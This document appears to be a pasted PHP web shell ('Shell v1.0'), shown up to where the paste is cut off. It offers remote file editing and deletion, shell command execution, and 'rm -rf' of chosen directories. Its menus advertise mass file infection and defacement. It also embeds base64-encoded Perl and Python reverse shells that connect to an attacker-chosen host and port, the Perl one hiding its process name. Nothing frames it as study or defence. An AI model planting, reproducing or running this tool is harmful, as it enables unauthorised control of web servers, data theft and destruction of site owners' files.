· 6 years ago · Aug 12, 2019, 05:24 AM
1<?php
2//Shell v1.0
3
4//Set a few ini settings to help performance and experience
5//I'd suggest not editing these
6@ini_set("memory_limit","9999M");
7@ini_set("max_execution_time", "0");
8@ini_set("upload_max_filesize", "9999m");
9@ini_set("magic_quotes_gpc", "0");
10@set_magic_quotes_runtime(0);
11set_time_limit(0);
12error_reporting(0);
13
14//Style variables, edit to your liking.
15//Font style
16$fontcolor = "#FFFFFF";
17$fontsize = "13px";
18$fontweight = "normal";
19
20//Table sytle
21$tablebordercolor = "none";
22$tablebgcolor = "none";
23$tablehovercolor = "#E66C2C";
24
25//Textarea style
26$textareabgcolor = "#141414";
27$textareafontcolor = "#FFFFFF";
28$textareabordercolor = "#FF0000";
29
30//Input stlye
31$inputbgcolor = "#141414";
32$inputfontcolor = "#FFFFFF";
33$inputbordercolor = "#FF0000";
34
35//Link style
36$linkcolor = "#FF0000";
37$activelinkcolor = "#FF0000";
38$hoverlinkcolor = "#FFFFFF";
39$visitedlinkcolor = "#FF0000";
40
41//Nav bar tabs
42$currentfile = basename(__FILE__);
43$tabs = array(
44 "Domain Information" => "./".$currentfile."?domainInformation",
45 "Hash Generator" => "./".$currentfile."?hashGenerator",
46 "Search" => array(
47 "Search Files/Dirs" => "./".$currentfile."?search",
48 "Config Finder" => "./".$currentfile."?configFinder",
49 "Admin Finder" => "./".$currentfile."?adminFinder"
50 ),
51 "Mass" => array(
52 "Infect Files" => "./".$currentfile."?fileInfect",
53 "Deface Files" => "./".$currentfile."?fileDeface"
54 ),
55 "MySQL Dumper" => array(
56 "MySQL Dumper v2.1" => "./".$currentfile."?installMSD",
57 "MySQL Dumper v1.24.4" => "./".$currentfile."?installMSD2"
58 ),
59 "Back Connect" => array(
60 "Perl" => "./".$currentfile."?bcPerl",
61 "Python" => "./".$currentfile."?bcPython",
62 "PHP" => "./".$currentfile."?bcPHP"
63 ),
64 "System" => array(
65 "Users" => "./".$currentfile."?users",
66 "Processes" => "./".$currentfile."?processes",
67 "Memory" => "./".$currentfile."?memory",
68 "CPU" => "./".$currentfile."?cpu"
69 ),
70 "Shell" => array(
71 "Check Links" => "./".$currentfile."?checkLinks",
72 "Credits" => "./".$currentfile."?credits",
73 "Kill" => "./".$currentfile."?kill"
74 )
75 );
76
77$links = array(
78 "MSD1" => array(
79 "LINK" => "http://dl.dropboxusercontent.com/s/yotek8j8z92puuv/msdv2.zip",
80 "MD5" => "bfd2f24a2a32277cc4babbc42649b3c1",
81 "DESC" => "MySQL Dumper v2.1 By: Plum"
82 ),
83 "MSD2" => array(
84 "LINK" => "http://dl.dropboxusercontent.com/s/0aei04zxm7p9wly/msd1.24.4.zip",
85 "MD5" => "9948baad310e0a4be04bb3f20f89938c",
86 "DESC" => "MySQL Dumper v1.24.4 By: http://www.mysqldumper.net/"
87 ),
88 "BOOTSTRAPCSS" => array(
89 "LINK" => "http://dl.dropboxusercontent.com/s/mzs89eukbo0apxz/bootstrap_navbar.css",
90 "MD5" => "5ed756c76e52bcf521040ff09a01f3f3",
91 "DESC" => "Bootstrap Nav Bar CSS"
92 ),
93 "BOOTSTRAPJS" => array(
94 "LINK" => "http://dl.dropboxusercontent.com/s/ogxuaa6ccn0itgd/bootstrap-dropdown.js",
95 "MD5" => "be4478613ae8c0bb1b799e6b340519e4",
96 "DESC" => "Bootstrap Dropdown JS"
97 ),
98 "BACKGROUND" => array(
99 "LINK" => "http://dl.dropboxusercontent.com/s//c5qti14t612qpbd/background.png",
100 "MD5" => "ec548490a2fd381c41cf7a3c17b93500",
101 "DESC" => "Background image"
102 )
103 );
104
105//Some variables
106if(!@$_GET['dir']) {
107 $dir = CleanDir(getcwd());
108} else {
109 $dir = CleanDir($_GET['dir']);
110}
111$version = "1.0";
112$yourip = $_SERVER['REMOTE_ADDR'];
113$whoami = function_exists("posix_getpwuid") ? posix_getpwuid(posix_geteuid()) : exe_cmd("whoami");
114$whoami = function_exists("posix_getpwuid") ? $whoami['name'] : exe_cmd("whoami");
115$uname = php_uname();
116$serversoftware = $_SERVER['SERVER_SOFTWARE'];
117$gatewayinterface = $_SERVER['GATEWAY_INTERFACE'];
118$servername = $_SERVER['SERVER_NAME'];
119$serverip = $_SERVER['SERVER_ADDR'];
120$safemode = ini_get('safe_mode') ? "Enabled" : "Disabled";
121$openbasedir = ini_get('open_basedir') ? "Enabled" : "Disabled";
122$disabledfunc = ini_get('disable_functions');
123$phpversion = phpversion();
124$domain = $_SERVER['HTTP_HOST'];
125$rootdir = CleanDir($_SERVER['DOCUMENT_ROOT']);
126$syscoms = array('system', 'shell_exec', 'proc_open', 'passthru', 'exec');
127$compression = array('zip', 'tar', 'tar.gz', 'tgz', 'gz', 'rar');
128
129//Base64'd stuff
130$bcpl = "IyEvdXNyL2Jpbi9wZXJsIC13DQojIHBlcmwtcmV2ZXJzZS1zaGVsbCAtIEEgUmV2ZXJzZSBTaGVsbCBpbXBsZW1lbnRhdGlvbiBpbiBQRVJMDQojIENvcHlyaWdodCAoQykgMjAwNiBwZW50ZXN0bW9ua2V5QHBlbnRlc3Rtb25rZXkubmV0DQojDQojIEFkZGVkIGNvbW1hbmQgbGluZSBhcmd1bWVudHMgZm9yIGVhc3kgZXhlY3V0aW9uIH4gUGx1bQ0KIyBTb3JyeSBhYm91dCByZW1vdmluZyB0aGUgcmVzdCBvZiB0aGUgY29tbWVudHMuIA0KIyBUcnlpbmcgdG8gc2F2ZSBhcyBtdWNoIHNwYWNlIGFzIHBvc3NpYmxlIGFzIHRoaXMgd2lsbCBiZSBiYXNlNjQnZA0KDQp1c2Ugc3RyaWN0Ow0KdXNlIFNvY2tldDsNCnVzZSBGaWxlSGFuZGxlOw0KdXNlIFBPU0lYOw0KbXkgJFZFUlNJT04gPSAiMS4wIjsNCm15ICRBUkdDPUBBUkdWOw0KDQojQ2hlY2sgaWYgYXJndW1lbnRzIGV4aXN0DQppZiAoJEFSR0MhPTIpIHsgDQogICBwcmludCAiVXNhZ2U6ICQwIFtIb3N0XSBbUG9ydF0gXG5cbiI7IA0KICAgZGllICJFeDogJDAgMTI3LjAuMC4xIDIxMjEgXG4iOyANCn0gDQoNCiMgV2hlcmUgdG8gc2VuZCB0aGUgcmV2ZXJzZSBzaGVsbC4gIENoYW5nZSB0aGVzZS4NCm15ICRpcCA9ICRBUkdWWzBdOw0KbXkgJHBvcnQgPSAkQVJHVlsxXTsNCg0KIyBPcHRpb25zDQpteSAkZGFlbW9uID0gMTsNCm15ICRhdXRoICAgPSAwOyAjIDAgbWVhbnMgYXV0aGVudGljYXRpb24gaXMgZGlzYWJsZWQgYW5kIGFueSANCgkJIyBzb3VyY2UgSVAgY2FuIGFjY2VzcyB0aGUgcmV2ZXJzZSBzaGVsbA0KbXkgJGF1dGhvcmlzZWRfY2xpZW50X3BhdHRlcm4gPSBxciheMTI3XC4wXC4wXC4xJCk7DQoNCiMgRGVjbGFyYXRpb25zDQpteSAkZ2xvYmFsX3BhZ2UgPSAiIjsNCm15ICRmYWtlX3Byb2Nlc3NfbmFtZSA9ICIvdXNyL3NiaW4vYXBhY2hlIjsNCg0KIyBDaGFuZ2UgdGhlIHByb2Nlc3MgbmFtZSB0byBiZSBsZXNzIGNvbnNwaWNpb3VzDQokMCA9ICJbaHR0cGRdIjsNCg0KIyBBdXRoZW50aWNhdGUgYmFzZWQgb24gc291cmNlIElQIGFkZHJlc3MgaWYgcmVxdWlyZWQNCmlmIChkZWZpbmVkKCRFTlZ7J1JFTU9URV9BRERSJ30pKSB7DQoJY2dpcHJpbnQoIkJyb3dzZXIgSVAgYWRkcmVzcyBhcHBlYXJzIHRvIGJlOiAkRU5WeydSRU1PVEVfQUREUid9Iik7DQoNCglpZiAoJGF1dGgpIHsNCgkJdW5sZXNzICgkRU5WeydSRU1PVEVfQUREUid9ID1+ICRhdXRob3Jpc2VkX2NsaWVudF9wYXR0ZXJuKSB7DQoJCQljZ2lwcmludCgiRVJST1I6IFlvdXIgY2xpZW50IGlzbid0IGF1dGhvcmlzZWQgdG8gdmlldyB0aGlzIHBhZ2UiKTsNCgkJCWNnaWV4aXQoKTsNCgkJfQ0KCX0NCn0gZWxzaWYgKCRhdXRoKSB7DQoJY2dpcHJpbnQoIkVSUk9SOiBBdXRoZW50aWNhdGlvbiBpcyBlbmFibGVkLCBidXQgSSBjb3VsZG4ndCBkZXRlcm1pbmUgeW91ciBJUCBhZGRyZXNzLiAgRGVueWluZyBhY2Nlc3MiKTsNCgljZ2lleGl0KDApOw0KfQ0KDQojIEJhY2tncm91bmQgYW5kIGRpc3NvY2lhdGUgZnJvbSBwYXJlbnQgcHJvY2VzcyBpZiByZXF1aXJlZA0KaWYgKCRkYWVtb24pIHsNCglteSAkcGlkID0gZm9yaygpOw0KCWlmICgkcGlkKSB7DQoJCWNnaWV4aXQoMCk7ICMgcGFyZW50IGV4aXRzDQoJfQ0KDQoJc2V0c2lkKCk7DQoJY2hkaXIoJy8nKTsNCgl1bWFzaygwKTsNCn0NCg0KIyBNYWtlIFRDUCBjb25uZWN0aW9uIGZvciByZXZlcnNlIHNoZWxsDQpzb2NrZXQoU09DSywgUEZfSU5FVCwgU09DS19TVFJFQU0sIGdldHByb3RvYnluYW1lKCd0Y3AnKSk7DQppZiAoY29ubmVjdChTT0NLLCBzb2NrYWRkcl9pbigkcG9ydCxpbmV0X2F0b24oJGlwKSkpKSB7DQoJY2dpcHJpbnQoIlNlbnQgcmV2ZXJzZSBzaGVsbCB0byAkaXA6JHBvcnQiKTsNCgljZ2lwcmludHBhZ2UoKTsNCn0gZWxzZSB7DQoJY2dpcHJpbnQoIkNvdWxkbid0IG9wZW4gcmV2ZXJzZSBzaGVsbCB0byAkaXA6JHBvcnQ6ICQhIik7DQoJY2dpZXhpdCgpOwkNCn0NCg0KIyBSZWRpcmVjdCBTVERJTiwgU1RET1VUIGFuZCBTVERFUlIgdG8gdGhlIFRDUCBjb25uZWN0aW9uDQpvcGVuKFNURElOLCAiPiZTT0NLIik7DQpvcGVuKFNURE9VVCwiPiZTT0NLIik7DQpvcGVuKFNUREVSUiwiPiZTT0NLIik7DQokRU5WeydISVNURklMRSd9ID0gJy9kZXYvbnVsbCc7DQpzeXN0ZW0oInc7dW5hbWUgLWE7aWQ7cHdkIik7DQpleGVjKHsiL2Jpbi9zaCJ9ICgkZmFrZV9wcm9jZXNzX25hbWUsICItaSIpKTsNCg0KIyBXcmFwcGVyIGFyb3VuZCBwcmludA0Kc3ViIGNnaXByaW50IHsNCglteSAkbGluZSA9IHNoaWZ0Ow0KCSRsaW5lIC49ICI8cD5cbiI7DQoJJGdsb2JhbF9wYWdlIC49ICRsaW5lOw0KfQ0KDQojIFdyYXBwZXIgYXJvdW5kIGV4aXQNCnN1YiBjZ2lleGl0IHsNCgljZ2lwcmludHBhZ2UoKTsNCglleGl0IDA7ICMgMCB0byBlbnN1cmUgd2UgZG9uJ3QgZ2l2ZSBhIDUwMCByZXNwb25zZS4NCn0NCg0KIyBGb3JtIEhUVFAgcmVzcG9uc2UgdXNpbmcgYWxsIHRoZSBtZXNzYWdlcyBnYXRoZXJlZCBieSBjZ2lwcmludCBzbyBmYXINCnN1YiBjZ2lwcmludHBhZ2Ugew0KCXByaW50ICJDb250ZW50LUxlbmd0aDogIiAuIGxlbmd0aCgkZ2xvYmFsX3BhZ2UpIC4gIlxyDQpDb25uZWN0aW9uOiBjbG9zZVxyDQpDb250ZW50LVR5cGU6IHRleHRcL2h0bWxcclxuXHJcbiIgLiAkZ2xvYmFsX3BhZ2U7DQp9";
131$bcpy = "IyEgL3Vzci9iaW4vZW52IHB5dGhvbg0KDQojIENvcHlyaWdodCAoYykgMjAxMSBYYXZpZXIgR2FyY2lhIHd3dy5zaGVsbGd1YXJkaWFucy5jb20NCiMgQWxsIHJpZ2h0cyByZXNlcnZlZC4NCiMNCiMgIEJhc2VkIG9uIHRoZSBQeXRob24gY29ubmVjdCBiYWNrIHNoZWxsIHdyaXR0ZW4gYnkgRGF2aWQgS2VubmVkeQ0KIyAgaHR0cDovL3d3dy5zZWNtYW5pYWMuY29tL2p1bmUtMjAxMS9jcmVhdGluZy1hLTEzLWxpbmUtYmFja2Rvb3Itd29ycnktZnJlZS1vZi1hdi8NCiMNCiMgQWRkZWQgY29tbWFuZCBsaW5lIGFyZ3VtZW50cyBmb3IgZWFzeSBleGVjdXRpb24NCiMgU29ycnkgYWJvdXQgcmVtb3ZpbmcgdGhlIHJlc3Qgb2YgdGhlIGNvbW1lbnRzDQojIFRyeWluZyB0byBzYXZlIHNwYWNlIGFzIHRoaXMgd2lsbCBiZSBiYXNlNjQnZA0KDQppbXBvcnQgc29ja2V0DQppbXBvcnQgc3VicHJvY2Vzcw0KaW1wb3J0IHN5cw0KaW1wb3J0IHRpbWUNCg0KaWYgbGVuKHN5cy5hcmd2KSA8IDM6DQoJcHJpbnQoJ1VzYWdlOiBweXRob24gJytzeXMuYXJndlswXSsnIDxJUD4gPFBPUlQ+JykNCglwcmludCgnRXhhbXBsZTogcHl0aG9uICcrc3lzLmFyZ3ZbMF0rJyAxMjcuMC4wLjEgMjEyMScpDQoJc3lzLmV4aXQoKQ0KDQpIT1NUID0gc3lzLmFyZ3ZbMV0gICAgIyBUaGUgcmVtb3RlIGhvc3QNClBPUlQgPSBpbnQoc3lzLmFyZ3ZbMl0pICAgIyBUaGUgc2FtZSBwb3J0IGFzIHVzZWQgYnkgdGhlIHNlcnZlcg0KDQpkZWYgY29ubmVjdCgoaG9zdCwgcG9ydCkpOg0KCXMgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pDQoJcy5jb25uZWN0KChob3N0LCBwb3J0KSkNCglyZXR1cm4gcw0KDQpkZWYgd2FpdF9mb3JfY29tbWFuZChzKToNCglkYXRhID0gcy5yZWN2KDEwMjQpDQoJaWYgZGF0YSA9PSAiZXhpdFxuIjoNCgkJcy5jbG9zZSgpDQoJCXN5cy5leGl0KDApDQoJIyB0aGUgc29ja2V0IGRpZWQNCgllbGlmIGxlbihkYXRhKT09MDoNCgkJcmV0dXJuIFRydWUNCgllbHNlOg0KCQkjIGRvIHNoZWxsIGNvbW1hbmQNCgkJcHJvYyA9IHN1YnByb2Nlc3MuUG9wZW4oZGF0YSwgc2hlbGw9VHJ1ZSwNCgkJCXN0ZG91dD1zdWJwcm9jZXNzLlBJUEUsIHN0ZGVycj1zdWJwcm9jZXNzLlBJUEUsDQoJCQlzdGRpbj1zdWJwcm9jZXNzLlBJUEUpDQoJCSMgcmVhZCBvdXRwdXQNCgkJc3Rkb3V0X3ZhbHVlID0gcHJvYy5zdGRvdXQucmVhZCgpICsgcHJvYy5zdGRlcnIucmVhZCgpDQoJCSMgc2VuZCBvdXRwdXQgdG8gYXR0YWNrZXINCgkJcy5zZW5kKHN0ZG91dF92YWx1ZSkNCgkJcmV0dXJuIEZhbHNlDQoNCmRlZiBtYWluKCk6DQoJd2hpbGUgVHJ1ZToNCgkJc29ja2VkX2RpZWQ9RmFsc2UNCgkJdHJ5Og0KCQkJcz1jb25uZWN0KChIT1NULFBPUlQpKQ0KCQkJd2hpbGUgbm90IHNvY2tlZF9kaWVkOg0KCQkJCXNvY2tlZF9kaWVkPXdhaXRfZm9yX2NvbW1hbmQocykNCgkJCXMuY2xvc2UoKQ0KCQlleGNlcHQgc29ja2V0LmVycm9yOg0KCQkJcGFzcw0KCQl0aW1lLnNsZWVwKDUpDQoNCmlmIF9fbmFtZV9fID09ICJfX21haW5fXyI6DQoJc3lzLmV4aXQobWFpbigpKQ==";
132
133//Some functions
134function CleanDir($directory) {
135 $directory = str_replace("\\", "/", $directory);
136 $directory = str_replace("//", "/", $directory);
137 return $directory;
138}
139
140function ByteConversion($bytes, $precision = 2) {
141 $kilobyte = 1024;
142 $megabyte = $kilobyte * 1024;
143 $gigabyte = $megabyte * 1024;
144 $terabyte = $gigabyte * 1024;
145
146 if (($bytes >= 0) && ($bytes < $kilobyte)) {
147 return $bytes . ' B';
148 } elseif (($bytes >= $kilobyte) && ($bytes < $megabyte)) {
149 return round($bytes / $kilobyte, $precision) . ' KB';
150 } elseif (($bytes >= $megabyte) && ($bytes < $gigabyte)) {
151 return round($bytes / $megabyte, $precision) . ' MB';
152 } elseif (($bytes >= $gigabyte) && ($bytes < $terabyte)) {
153 return round($bytes / $gigabyte, $precision) . ' GB';
154 } elseif ($bytes >= $terabyte) {
155 return round($bytes / $terabyte, $precision) . ' TB';
156 } else {
157 return $bytes . ' B';
158 }
159}
160
161function success($message) {
162 echo "<center><font color='green' size='5'><b>$message</b></font></center>";
163}
164
165function error($message) {
166 echo "<center><font color='red' size='5'><b>$message</b></font></center>";
167}
168
169function redirect($url) {
170 echo "<script>window.location = '$url';</script>";
171}
172
173function mass_files($mass_dir, $justdirs) {
174 if($dh = opendir($mass_dir)) {
175 $files = array();
176 $inner_files = array();
177 while($file = readdir($dh)) {
178 if($file != "." && $file != ".." && $file[0] != '.') {
179 if(is_dir($mass_dir . "/" . $file)) {
180 $inner_files = mass_files("$mass_dir/$file", $justdirs);
181 if(is_array($inner_files)) $files = array_merge($files, $inner_files);
182 if($justdirs) { array_push($files, "$mass_dir/$file"); }
183 } else {
184 if(!$justdirs) { array_push($files, "$mass_dir/$file"); }
185 }
186 }
187 }
188 closedir($dh);
189 return $files;
190 }
191}
192
193function can_exe() {
194 global $disabledfunc;
195 global $syscoms;
196 $disabledfunc = explode(",", str_replace(' ', '', $disabledfunc));
197 if(count(array_intersect($syscoms, $disabledfunc)) == count($syscoms)) {
198 return false;
199 } else {
200 return true;
201 }
202}
203
204function exe_cmd($command) {
205 global $dir;
206 chdir($dir);
207 if(function_exists('proc_open')) {
208 $execute = proc_open($command, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
209 $result = "";
210 while (!feof($io[1])) {
211 $result .= htmlspecialchars(fgets($io[1]), ENT_COMPAT, 'UTF-8');
212 }
213 while (!feof($io[2])) {
214 $result .= htmlspecialchars(fgets($io[2]), ENT_COMPAT, 'UTF-8');
215 }
216 fclose($io[1]);
217 fclose($io[2]);
218 proc_close($execute);
219 return $result;
220 } elseif(function_exists('system')) {
221 $result = system($command);
222 return $result;
223 } elseif(function_exists('exec')) {
224 $result = exec($command);
225 return $result;
226 } elseif(functions_exists('shell_exec')) {
227 $result = shell_exec($command);
228 return $result;
229 } elseif(function_exists('passthru')) {
230 $result = passthru($command);
231 return $result;
232 }
233}
234
235function salt_gen($length) {
236 $characters = array("a","A","b","B","c","C","d","D","e","E","f","F","g","G","h","H","i","I","j","J","k","K","l","L","m","M","n","N","o","O","p","P","q","Q","r","R","s","S","t","T","u","U","v","V","w","W","x","X","y","Y","z","Z","1","2","3","4","5","6","7","8","9");
237 $i = 0;
238 $salt = "";
239 while($i < $length) {
240 $arrand = array_rand($characters, 1);
241 $salt .= $characters[$arrand];
242 $i++;
243 }
244 return $salt;
245}
246
247function extract_file($filepath, $extractpath, $type) {
248 if($type == 'zip') {
249 if(class_exists('ZipArchive')) {
250 $newzip = new ZipArchive;
251 $open = $newzip->open($filepath);
252 if($open == true) {
253 $newzip->extractTo($extractpath);
254 $newzip->close();
255 redirect("?dir=$extractpath");
256 } else {
257 error('Failed to open zip archive!');
258 }
259 } else {
260 if(can_exe()) {
261 error('ZipArchive class does not exist!<br>Trying to extract via sys commands');
262 echo "<center>
263 The response from 'unzip $filepath -d $extractpath' was:<br>
264 <textarea rows='10' cols='85' readonly>".exe_cmd("unzip $filepath -d $extractpath")."</textarea>
265 </center>";
266 } else {
267 error('Zip archive does not exist and commands can not be executed!');
268 }
269 }
270 } elseif($type == 'tar') {
271 if(class_exists('PharData')) {
272 $newphar = new PharData($filepath);
273 $newphar->extractTo($extractpath);
274 unlink($filepath);
275 redirect("?dir=$extractpath");
276 } else {
277 if(can_exe()) {
278 error('PharData class does not exist!<br>Trying to extract via sys commands');
279 echo "<center>
280 The response from 'tar xvf $filepath -C $extractpath' was:<br>
281 <textarea rows='10' cols='85' readonly>".exe_cmd("tar xvf $filepath -C $extractpath")."</textarea>
282 </center>";
283 } else {
284 error('PharData class does not exist and commands can not be executed!');
285 }
286 }
287 } elseif($type == 'gz') {
288 if(function_exists('gzopen')) {
289 $decomname = $extractpath."/".str_replace(".gz", "", pathinfo($filepath, PATHINFO_BASENAME));
290 $open = gzopen($filepath, "rb");
291
292 while($contents = gzread($open, 4096)) {
293 file_put_contents($decomname, $contents, FILE_APPEND);
294 }
295 gzclose($open);
296 redirect("?dir=$extractpath");
297 } else {
298 if(can_exe()) {
299 $decomname = $extractpath."/".str_replace(".gz", "", pathinfo($filepath, PATHINFO_BASENAME));
300 error('Zlib does not seem to be enabled!<br>Trying to extract via sys commands.');
301 echo "<center>
302 The response from 'gunzip -c $filepath > $decomname' was:<br>
303 <textarea rows='10' cols='85' readonly>".exe_cmd("gunzip -c $filepath > $decomname")."</textarea>
304 </center>";
305 } else {
306 error('Zlib does not seem to be enabled and commands can not be executed!');
307 }
308 }
309 } elseif($type == 'tgz') {
310 if(class_exists('PharData')) {
311 $newphar = new PharData($filepath);
312 $newphar->decompress();
313
314 $newphar = new PharData(str_replace(".tgz", ".tar", $filepath));
315 $newphar->extractTo($extractpath);
316 unlink($filepath);
317 unlink(str_replace(".tgz", ".tar", $filepath));
318 redirect("?dir=$extractpath");
319 } else {
320 if(can_exe()) {
321 error('PharData class does not exist!<br>Trying to extract via sys commands.');
322 echo "<center>
323 The response from 'tar xvfz $filepath -C $extractpath && rm $filepath' was:<br>
324 <textarea rows='10' cols='85' readonly>".exe_cmd("tar xvfz $filepath -C $extractpath && rm $filepath")."</textarea>
325 </center>";
326 } else {
327 error('PharData class does not exist and commands can not be executed!');
328 }
329 }
330 } elseif($type == 'rar') {
331 if(class_exists('RarArchive')) {
332 $openrar = RarArchive::open($filepath);
333
334 if($raropen == true) {
335 $entries = $openrar->getEntries();
336 foreach($entries as $files) {
337 $files->extract($extractpath);
338 }
339 $openrar->close();
340 } else {
341 error('Failed to open rar file!');
342 $openrar->close();
343 }
344 } else {
345 if(can_exe()) {
346 error('RarArchive class does not exist!<br>Trying to extract via sys commands.');
347 echo "<center>
348 The response from 'unrar x $filepath $extractpath' was:<br>
349 <textarea rows='10' cols='85' readonly>".exe_cmd("unrar x $filepath $extractpath")."</textarea>
350 </center>";
351 } else {
352 error('RarArchive class does not exist and commands can not be executed!');
353 }
354 }
355 }
356}
357
358//Let's initiailize the stylesheet
359echo "
360<link rel='stylesheet' href='".$links['BOOTSTRAPCSS']['LINK']."'>
361<script src='//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js'></script>
362<script src='".$links['BOOTSTRAPJS']['LINK']."'></script>
363<style>
364body {
365 background: #141414 url('".$links['BACKGROUND']['LINK']."');
366 color: $fontcolor;
367 padding-top: 100px !important;
368 margin:0;
369 font-family:\"Helvetica Neue\",Helvetica,Arial,sans-serif;
370 font-size:$fontsize;
371 font-weight:$fontweight;
372}
373table{
374 border-color: $tablebordercolor;
375 background-color: $tablebgcolor;
376}
377#hover tr:hover{
378 background-color: $tablehovercolor;
379}
380textarea {
381 background-color: $textareabgcolor;
382 resize:none;
383 color: $textareafontcolor;
384 border-color: $textareabordercolor;
385 outline: none;
386}
387input {
388 background-color: $inputbgcolor;
389 resize:none;
390 color: $inputfontcolor;
391 border-color: $inputbordercolor;
392 outline: none;
393}
394a:link {color: $linkcolor; text-decoration: none; }
395a:active {color: $activelinkcolor; text-decoration: none; }
396a:visited {color: $visitedlinkcolor; text-decoration: none; }
397a:hover {color: $hoverlinkcolor; text-decoration: none; }
398</style>";
399
400//Let's display nav bar
401echo <<<html
402<script>
403 $(window).load(function(){
404 $('#topbar').dropdown();
405 });
406</script>
407<div class="topbar" id="topbar">
408 <div class="fill">
409 <div class="container">
410 <a class="brand" href="./$currentfile">Home</a>
411 <ul class="nav">
412html;
413foreach($tabs as $title => $link) {
414 if(is_array($link)) {
415 echo '<li class="menu">
416 <a href="#" class="menu">'.$title.'</a>
417 <ul class="menu-dropdown">';
418 foreach($link as $dtitle => $dlink) {
419 echo "<li><a href='$dlink'>$dtitle</a></li>";
420 }
421 echo "</ul>";
422 } else {
423 echo "<li><a href='$link'>$title</a></li>";
424 }
425}
426echo <<<html
427 </ul>
428 </div>
429 </div>
430</div>
431html;
432
433//Let's display system bar
434if(empty($disabledfunc)) {
435 $disabledfun = "None";
436} else {
437 $count = count(explode(",", $disabledfunc));
438 $disabledfun = "<a href='?disabledFunctions'>$count functions disabled</a>";
439}
440echo <<<html
441<table width="100%" border="1">
442 <tr>
443 <th>Your IP</th>
444 <th>User</th>
445 <th>System</th>
446 <th>Server Software</th>
447 <th>Gateway Interface</th>
448 <th>PHP Version</th>
449 <th>Server Name</th>
450 <th>Server IP</th>
451 <th>safe_mode</th>
452 <th>open_basedir</th>
453 <th>Disabled Functions</th>
454 </tr>
455 <tr>
456 <td>$yourip</td>
457 <td>$whoami</td>
458 <td>$uname</td>
459 <td>$serversoftware</td>
460 <td>$gatewayinterface</td>
461 <td>$phpversion</td>
462 <td>$servername</td>
463 <td>$serverip</td>
464 <td>$safemode</td>
465 <td>$openbasedir</td>
466 <td>$disabledfun</td>
467 </tr>
468</table><br><br>
469html;
470
471//Anything to be displayed between the system bar and files should go here.
472
473//Read/Edit file stuff
474if(isset($_POST['save_file'])) {
475 $file = $_GET['edit'];
476 $newcontent = $_POST['edit_file'];
477 if(get_magic_quotes_gpc()) {
478 $newcontent = stripslashes($newcontent);
479 }
480 if(file_put_contents($file, $newcontent)) {
481 success("File has been saved successfully!");
482 } else {
483 error("File was not saved successfully!");
484 }
485}
486if(isset($_POST['delete_file'])) {
487 $file = $_GET['edit'];
488 if(unlink($file)) {
489 success("File was successfully deleted!");
490 } else {
491 error("File could not be deleted successfully!");
492 }
493}
494
495if(isset($_GET['delF'])) {
496 $file = $_GET['delF'];
497 if(unlink($file)) {
498 success("File was successfully deleted!");
499 } else {
500 error("File could not be deleted successfully!");
501 }
502}
503
504if(isset($_GET['delD'])) {
505 $ddir = $_GET['delD'];
506 if(can_exe()) {
507 echo "<center>
508 The response from 'rm -rf $ddir' was:<br>
509 <textarea cols='120' rows='20'>".exe_cmd("rm -rf $ddir")."</textarea>
510 </center>";
511 } else {
512 if(rmdir($ddir)) {
513 success("Directory successfully deleted!");
514 } else {
515 error("Failed to delete directory!");
516 }
517 }
518}
519
520if(isset($_GET['edit'])) {
521 $file = $_GET['edit'];
522 if(file_exists($file)) {
523 $content = htmlspecialchars(file_get_contents($file));
524 if(!is_writeable($file)) {
525 echo "<center>
526 <font color='red' size=5>This file is read only!</font><br>
527 <textarea cols='120' rows='25' name='edit_file' readonly >$content</textarea>
528 </center>";
529 } else {
530 echo "<center>
531 <form action='' method='post'>
532 <textarea cols='120' rows='25' name='edit_file'>$content</textarea><br>
533 <input type='submit' name='save_file' value='Save'>
534 <input type='submit' name='delete_file' value='Delete'>
535 </form>
536 </center>";
537 }
538 } else {
539 error("File does not exist!");
540 }
541}
542
543//Rename file stuff
544if(isset($_POST['rename'])) {
545 $newname = $_POST['new_name'];
546 $oldname = $_GET['rename'];
547 $rdir = $_GET['rdir'];
548 if(rename("$rdir/$oldname", "$rdir/$newname")) {
549 success("File was successfully renamed to: $newname");
550 } else {
551 error("File was not renamed!");
552 }
553}
554
555if(isset($_GET['rename'])) {
556 $oldname = $_GET['rename'];
557 echo "<center>
558 <form action='' method='post'>
559 Rename: <input type='text' name='new_name' value='$oldname'>
560 <input type='submit' name='rename' value='rename'>
561 </form>
562 </center>";
563}
564
565//Domain information stuff
566if(isset($_GET['domainInformation'])) {
567 $dns_record = dns_get_record($domain, DNS_ANY, $authns, $addtl);
568 $num = 0;
569 $count = sizeof($dns_record);
570 echo "<br>Name Servers:</b><br>";
571 while($num < $count) {
572 $name_servers = $dns_record[$num];
573 $name_servers2 = $name_servers['type'];
574 $name_servers3 = @$name_servers['target'];
575 $num++;
576 if($name_servers2 == "NS") {
577 echo "$name_servers3<br>";
578 $nshost = @$name_servers['host'];
579 }
580 if($name_servers2 == "SOA") {
581 $nsemail = $name_servers['rname'];
582 }
583 if($name_servers2 == "A") {
584 $nsip = $name_servers['ip'];
585 }
586 }
587 echo "<br><table class='noborder'>
588 <tr>
589 <td><b>Host:</b></td>
590 <td>$nshost</td>
591 </tr>
592 <tr>
593 <td><b>IP:</b></td>
594 <td>$nsip</td>
595 </tr>
596 <tr>
597 <td><b>Email:</b></td>
598 <td>$nsemail</td>
599 </tr>
600 </table><br>";
601 $num = 0;
602 $domains_on_server = json_decode(file_get_contents("http://www.yougetsignal.com/tools/web-sites-on-web-server/php/testing.php?remoteAddress=$domain"));
603 $status = $domains_on_server->status;
604 $message = $domains_on_server->message;
605 $domainAr = $domains_on_server->domainArray;
606 $num_of_site = $domains_on_server->domainCount;
607 $count = sizeof($domainAr);
608 if($status == "Success") {
609 echo "Found $num_of_site sites hosted on the same server as $nshost($nsip) via <a class='navbar' href='http://www.yougetsignal.com/tools/web-sites-on-web-server/'>www.yougetsignal.com</a>:<br><br> <table class='noborder'>";
610 while($num < $count) {
611 $hossites = $domainAr[$num];
612 $num++;
613 $hossites3 = $domainAr[$num];
614 $hossites3 = $hossites3[0];
615 $hossites = $hossites[0];
616 $site_ips = empty($hossites) ? "" : "(" .gethostbyname($hossites). ")";
617 $site_ips2 = empty($hossites3) ? "" : "(" .gethostbyname($hossites3). ")";
618 echo "<tr><td><a class='navbar' href='http://$hossites'>$hossites</a> $site_ips</td><td><a class='navbar' href='http://$hossites3'>$hossites3</a> $site_ips2</td></tr>";
619 $num++;
620 }
621 echo "</table><br>";
622 $num = 0;
